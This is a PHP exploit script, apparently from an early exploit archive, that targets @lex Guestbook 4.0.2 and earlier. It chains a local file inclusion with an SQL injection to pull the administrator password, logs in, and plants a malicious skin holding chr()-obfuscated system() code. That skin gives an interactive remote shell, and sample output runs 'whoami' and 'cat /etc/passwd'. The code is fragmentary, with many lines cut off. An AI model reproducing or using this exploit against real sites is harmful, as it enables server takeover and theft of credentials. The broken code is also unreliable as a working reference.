@lex Guestbook <= 4.0.2 Remote Command Execution Exploit
- Date: 7 Jan 2007 08:52:34 -0000
* This file requires the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
| header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header> ========================================================
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> Done
| status> Trying to add a skin
| sploit> Done
| status> Writing the malicious skin
| $shell> whoami
| darkfig
| $shell> cat /etc/passwd ...
if($argc < 2)
print "\n---------------------------------------------------------";
print "\nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version
print "\nPoc.ID........: 20070107";
print "\nType..........: PHP Code Execution";
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
$xpl = new phpsploit();
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
| livre_include.php -> Local File Inclusion
| =================
| ... set_magic_quotes_runtime(0); // thx =)
| ... if (isset($_GET['lang']) && $_GET['lang'] &&
| $f_language = str_replace("..","",$_GET['lang']); // We can't use "...." directly because of the file_exists() check, but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and
$sql = "index.php?lang=english.php%00'%20union%20select%20".
print "\nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "\nheader> ========================================================";
print "\nstatus> Retrieving the administrator password";
print "\nsploit> AdminUsername::".$count[1]."\nsploit>
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to get logged in";
print "\nsploit> Done";
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/",
if(!preg_match('#alert\("ERREUR\n#',$xpl->getcontent())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");
$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
$data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
print "\nstatus> Writing the malicious skin\n\$shell> ";
// skins.php ...
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
print $xpl->getcontent();
print "\n\$shell> ";